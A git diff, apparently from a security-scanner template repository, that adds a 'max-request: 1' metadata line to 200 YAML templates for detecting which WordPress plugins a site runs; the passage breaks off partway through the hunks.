http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-and-footer-scripts.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/iwp-client.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + http/technologies/wordpress/plugins/loginpress.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + http/technologies/wordpress/plugins/photo-gallery.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-builder.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/use-any-font.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + .../technologies/wordpress/plugins/velvet-blues-update-urls.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 200 files changed, 200 insertions(+) diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 7cbd1855ae..ebb5ba1042 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: + max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 8d579ff23d..fddfbf3118 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: + max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 4a6d8b7bbe..7a6e8a76ec 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: + max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index e4eb308d39..940c0e614c 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: + max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 97f1d8c18f..06cfd4950b 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: + max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 10f104f2c7..90aa5881fd 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: + max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 8addc28ded..1bf337da6c 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: + max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 2e579621ac..7cec152555 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 41e297ffeb..8a4b6133cd 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 0dd8686ec3..cfa2e3d080 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: + max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 359671f3bd..a92d9bde4e 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: + max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 116e0c420a..59144c7dd5 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: + max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index dc4703ef8d..df06ba2f35 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: + max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 1426ac3ef2..2a79d529cc 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: + max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 78d1651ff4..556a113acc 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: + max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index f7219b373d..58d9a9d738 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: + max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index f688a68f72..6c9c485079 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: + max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 00e95c4263..7631e87d78 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: + max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 212b2b13c4..c7daa26ac6 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: + max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 6318392c5c..68767e4dce 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: + max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index e1a2a186e0..073618936d 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: + max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 23614882a7..6aabc19e9f 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: + max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 85965337cb..ac80e4f31b 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: + max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 33d903a1b4..15d7a24755 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: + max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 3c6f8f287b..40ccc15b27 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: + max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cloudflare.yaml b/http/technologies/wordpress/plugins/cloudflare.yaml index e555bf93d3..425adf0bfe 100644 --- a/http/technologies/wordpress/plugins/cloudflare.yaml +++ b/http/technologies/wordpress/plugins/cloudflare.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cloudflare/ metadata: + max-request: 1 plugin_namespace: cloudflare wpscan: https://wpscan.com/plugin/cloudflare tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index c3b630cde2..1fad3cee08 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: + max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 5c8ce709b6..ebe4ee41a7 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: + max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index aea47b9e84..5c32110e0e 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: + max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 78c584c388..09c2e2f360 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: + max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 2c80d09c27..1a2e8beb3e 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: + max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4b1b3a8754..706145493c 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: + max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 06ad83bdf7..cf6a6ee635 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: + max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index b20666268f..c039765929 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: + max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index b2a097bfe7..a2c92dff4b 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: + max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index c71fa258af..41b5d6c854 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: + max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 5a98e67597..cca31cc3a9 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: + max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 4463174203..ff9c0a49ce 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: + max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index cfac0b961b..a76d3306bb 100644 --- 